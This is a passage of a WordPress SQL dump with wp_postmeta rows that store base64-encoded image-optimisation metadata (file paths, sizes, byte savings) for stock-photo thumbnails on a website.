0ZXJzdG9ja18zMzE5Mjk4NjktMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzMxOTI5ODY5LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyNjA0LCJpZCI6NzU3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMzMTkyOTg2OS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMzE5Mjk4NjktMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzMxOTI5ODY5LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyNjA3LCJpZCI6NzU3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMzMTkyOTg2OS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMzE5Mjk4NjktMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzMxOTI5ODY5LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyNjA5LCJpZCI6NzU3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMzMTkyOTg2OS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMzE5Mjk4NjktMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzMxOTI5ODY5LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyNjEyLCJpZCI6NzU3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMzMTkyOTg2OS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMzE5Mjk4NjktNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzMxOTI5ODY5LTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyNjE0LCJpZCI6NzU3fV0='); 
INSERT INTO `wp_postmeta` VALUES (30017, 756, 'wpfc_optimisation_reduction', '2114841'); 
INSERT INTO `wp_postmeta` VALUES (30018, 756, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMzMTkyOTg1Ny5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMzE5Mjk4NTcuanBnIiwid2lkdGgiOjI2OTAsImhlaWdodCI6MTg1OSwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMzE5Mjk4NTcuanBnIiwicmVkdWN0aW9uIjoyMTE0ODI4LCJ0aW1lIjoxNDgzNTgyNjI1LCJpZCI6Ijc1NiJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMzMTkyOTg1Ny0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMzE5Mjk4NTctMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzMxOTI5ODU3LTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyNjI4LCJpZCI6NzU2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMzE5Mjk4NTctODAweDU1My5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjU1MywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzMxOTI5ODU3LTgwMHg1NTMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMzMTkyOTg1Ny04MDB4NTUzLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4MjYzMSwiaWQiOjc1Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzMxOTI5ODU3LTc2OHg1MzEuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MzEsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMzMTkyOTg1Ny03Njh4NTMxLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMzE5Mjk4NTctNzY4eDUzMS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODI2MzQsImlkIjo3NTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMzMTkyOTg1Ny0xNjAweDExMDYuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTEwNiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzMxOTI5ODU3LTE2MDB4MTEwNi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzMxOTI5ODU3LTE2MDB4MTEwNi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODI2MzksImlkIjo3NTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMzMTkyOTg1Ny0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMzE5Mjk4NTctMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzMxOTI5ODU3LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyNjQyLCJpZCI6NzU2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMzE5Mjk4NTctMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzMxOTI5ODU3LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMzMTkyOTg1Ny0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4MjY0NCwiaWQiOjc1Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzMxOTI5ODU3LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMzMTkyOTg1Ny0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMzE5Mjk4NTctMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODI2NDcsImlkIjo3NTZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMzMTkyOTg1Ny01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMzE5Mjk4NTctNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzMxOTI5ODU3LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyNjUwLCJpZCI6NzU2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMzMTkyOTg1Ny0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMzE5Mjk4NTctMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzMxOTI5ODU3LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyNjUyLCJpZCI6NzU2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMzMTkyOTg1Ny0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMzE5Mjk4NTctMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzMxOTI5ODU3LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyNjU0LCJpZCI6NzU2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMzMTkyOTg1Ny0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMzE5Mjk4NTctMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzMxOTI5ODU3LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyNjU3LCJpZCI6NzU2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMzMTkyOTg1Ny0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMzE5Mjk4NTctMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzMxOTI5ODU3LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyNjU5LCJpZCI6NzU2fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMzMTkyOTg1Ny00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMzE5Mjk4NTctNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzMxOTI5ODU3LTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTgyNjYyLCJpZCI6NzU2fV0='); 
INSERT INTO `wp_postmeta` VALUES (30019, 755, 'wpfc_optimisation_reduction', '10597'); 
INSERT INTO `wp_postmeta` VALUES (30020, 755, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMyMTYwMjQyOS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMjE2MDI0MjkuanBnIiwid2lkdGgiOjQ5OTIsImhlaWdodCI6MjgwOCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4MjY2NywiaWQiOiI3NTUifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMjE2MDI0MjktMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzIxNjAyNDI5LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMyMTYwMjQyOS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NTQyLCJ0aW1lIjoxNDgzNTgyNjcxLCJpZCI6NzU1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMjE2MDI0MjktODAweDQ1MC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjQ1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzIxNjAyNDI5LTgwMHg0NTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMyMTYwMjQyOS04MDB4NDUwLmpwZyIsInJlZHVjdGlvbiI6OTE3LCJ0aW1lIjoxNDgzNTgyNjc0LCJpZCI6NzU1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMjE2MDI0MjktNzY4eDQzMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjQzMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzIxNjAyNDI5LTc2OHg0MzIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMyMTYwMjQyOS03Njh4NDMyLmpwZyIsInJlZHVjdGlvbiI6Nzc1LCJ0aW1lIjoxNDgzNTgyNjc4LCJpZCI6NzU1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMjE2MDI0MjktMTYwMHg5MDAuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6OTAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMjE2MDI0MjktMTYwMHg5MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMyMTYwMjQyOS0xNjAweDkwMC5qcGciLCJyZWR1Y3Rpb24iOjM0OTEsInRpbWUiOjE0ODM1ODI2ODMsImlkIjo3NTV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMyMTYwMjQyOS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMjE2MDI0MjktMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzIxNjAyNDI5LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1MDYsInRpbWUiOjE0ODM1ODI2ODYsImlkIjo3NTV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMyMTYwMjQyOS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMjE2MDI0MjktMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzIxNjAyNDI5LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0MjIsInRpbWUiOjE0ODM1ODI2OTAsImlkIjo3NTV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMyMTYwMjQyOS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFw